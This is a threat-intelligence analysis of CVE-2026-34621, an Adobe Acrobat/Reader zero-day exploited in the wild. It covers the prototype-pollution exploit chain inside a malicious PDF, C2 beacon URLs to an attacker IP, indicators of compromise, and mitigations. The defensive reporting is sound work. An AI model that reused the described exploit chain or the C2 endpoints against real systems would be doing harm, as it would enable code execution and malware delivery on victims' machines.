On 2026-04-11, Adobe assigned CVE-2026-34621 to an in-the-wild zero-day in Acrobat/Reader and classified it as critical arbitrary code execution. The flaw was first flagged publicly on 2026-04-08 by Haifei Li’s EXPMON system, which identified active exploitation of the Adobe Reader JavaScript engine; Adobe later credited Haifei Li for discovery and confirmed that the issue was being exploited in the wild.
Technically, Adobe classifies the vulnerability as CWE-1321 (Improperly Controlled Modification of Object Prototype Attributes, prototype pollution) with CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H and a score of 9.6. The affected builds were Acrobat DC Continuous 26.001.21367 and earlier, Acrobat Reader DC Continuous 26.001.21367 and earlier, and Acrobat 2024 Classic 24.001.30356 and earlier on Windows and macOS. Fixed builds are Acrobat DC/Reader DC 26.001.21411, Acrobat 2024 Classic 24.001.30362 on Windows, and 24.001.30360 on macOS. Adobe set Priority Rating 1, meaning installation within 72 hours.
The primary weaponized sample analyzed by N3mes1s was Invoice540.pdf, a 320,066-byte, PDF 1.7, single-page document created with PyMuPDF and using a 68-byte FlateDecode watermark. Its metadata included the title Blank Page, /Lang en-US, and embedded structures /JavaScript 2, /JS 1, /OpenAction 1, /AcroForm 1, and 11 streams. The sample carried a hidden form field named btn1 with a zero-size rectangle [/Rect [0 0 0 0]] that stored a 98,588-byte base64 blob. N3mes1s reported only two samples in the wild and no detections from network indicators at the time of analysis.
The initial execution chain starts with a 699-byte JSFuck loader embedded in the PDF /JS action and triggered automatically on open. That loader reads a 74 KB Stage 2 payload from a FlateDecode stream. Stage 2 begins with string-table decoding through a function labeled a0_0x23c2(), which rotates an array to recover 141 encoded strings, then fingerprints the environment with app.platform (WIN or MAC), app.language (ENU or RUS), app.viewerVersion, and Collab.isDocReadOnly for ADFS or enterprise detection. Those values are encoded into beacon parameters such as errs=, adfs=, and plts= before any further payload delivery occurs.
The zero-day itself is the prototype-pollution step. N3mes1s showed that the payload injects Object.prototype.__defineGetter__("ANFancyAlertImpl", function() { ... }), which hijacks the annotation alert dialog across all objects by rewriting shared prototype behavior. The exploit then pivots into privilege escalation by wrapping app.beginPriv() and app.endPriv() inside app.trustedFunction(), enabling calls to ANShareFile() and the undocumented SilentDocCenterLogin() API. N3mes1s reported no VirusTotal references for SilentDocCenterLogin(), making it the most notable undocumented interface in the chain. The final execution step uses Collab.collectEmailInfo() to run the delivered code.
The command-and-control design uses split-key delivery rather than a single monolithic fetch. The first beacon, labeled bird0, performs a GET to http://188.214.34.20:34123/rs1?deer=<fingerprint>&errs=E&adfs=1&plts=WIN and returns a 32-byte AES key. The second beacon, bird1, calls http://188.214.34.20:34123/s11?reindeer=<fingerprint> and receives an AES-CTR encrypted Stage 3 payload of roughly 50 KB, which is then decrypted with the rs1 key, processed with PKCS#7 padding, and zlib decompressed before execution. N3mes1s validated the behavior by running Adobe’s real SpiderMonkey engine (EScript.api) on Linux through the taviso/loadlibrary fork and reported 23/23 test cases passing.
The delivery infrastructure also includes server-side filtering. N3mes1s reported that the C2 returned empty responses to sandboxes, and wdormann independently observed that the PDF “un-blurs” itself in Reader and then contacts 188.214.34.20:34123, but the server returned nothing when tested from a Tor-connected VM. wdormann suspected filtering based on the language=ENU parameter. That same analysis also noted that Mark of the Web does not stop the chain, so browser-zone tagging is not an effective defense here. N3mes1s later assessed the unrecovered Stage 3 as likely a RAT, backdoor, or infostealer, but that final payload was not recovered in the shared analysis.
Targeting indicators come primarily from the decoy content and locale choices. N3mes1s reported Russian-language decoy documents about gas supply disruption and emergency measures in one sample, and a Russian agreement or contract with Moscow addresses in a second sample identified by partial hash 65dca34b. Both documents suggest energy-sector or government targeting, but the provided sources do not support a named actor attribution. The samples were also built with /Lang en-US despite Russian decoy content, which aligns with the language-based filtering observed in the C2 behavior. Community reports further described the sample as a sophisticated fingerprinting exploit aimed at Adobe Reader users rather than a generic mass-delivery payload.
The principal indicators of compromise are:
SHA-256: 54077a5b15638e354fa02318623775b7a1cc0e8c21e59bcbab333035369e377fSHA-1: dafd571da1df72fb53bcd250e8b901103b51d6e4MD5: 522cda0c18b410daa033dc66c48eb75a- Partial related sample hash:
65dca34b - File name:
Invoice540.pdf - Size:
320,066 bytes - MIME/format:
PDF 1.7,1 page - Builder:
PyMuPDF - Hidden payload field:
btn1 - C2 IP and port:
188.214.34.20:34123 - C2 endpoints:
/rs1,/s11 - C2 keywords:
bird0,bird1,deer,reindeer - Exploited or abused APIs:
Object.prototype.__defineGetter__,app.trustedFunction(),app.beginPriv(),app.endPriv(),ANFancyAlertImpl,ANShareFile(),SilentDocCenterLogin(),Collab.collectEmailInfo() - AV labels reported on the sample:
ESET-NOD32 JS/TrojanDropper.Agent.QCE,Avast JS:Pdfka-gen [Expl],AVG JS:Pdfka-gen [Expl],Cynet Malicious (99),Cylance Unsafe,Gridinsoft PDF.Exploit.JS
The community timeline is consistent across independent reporting. On 2026-04-08, Haifei Li first warned that the Adobe Reader zero-day was active in the wild and appeared to involve the JavaScript engine; Gi7w0rm’s repost pointed to the same conclusion. Also on 2026-04-08, N3mes1s published the first forensic summary with the sample hash, detection rate 6/77 (7.8%), decoy-language observations, and the hidden btn1 payload. On 2026-04-09, Haifei Li corrected an earlier calendar slip and said discovery was 4 months before patch release, not 5; Casey relayed that disabling JavaScript in Adobe Reader should block the initial attack; EXPMON described the exploit as a sophisticated fingerprinting attack; and malwrhunterteam noted a related sample on Malware Bazaar and that a recently registered VirusTotal account had voted the sample harmless about 20 hours earlier. That same day, wdormann reported that multiple PDFs exploited the flaw, that Reader removed the blur effect and contacted the C2, and that Tor-connected testing produced empty responses. On 2026-04-10, N3mes1s said the taviso/loadlibrary approach worked against Adobe’s DLL JS engine and that a writeup was coming. On 2026-04-11, N3mes1s relayed the final name CVE-2026-34621, Adobe published APSB26-43, EXPMON’s findings were confirmed, and Adobe described the patch as an emergency update to be installed within 72 hours.
Mitigation is straightforward but time-sensitive. The only supported durable fix is to install the Adobe updates for the affected Acrobat and Reader branches immediately, because Adobe marked the issue Priority 1. Short-term containment is to disable JavaScript in Adobe Reader, which community analysis indicated would stop the initial trigger, but that is a partial control rather than a full remediation. Mark of the Web should not be treated as a defense for this incident, and the observed C2 behavior shows that sandboxing and generic network inspection may miss the payload because the server can withhold it based on client fingerprinting.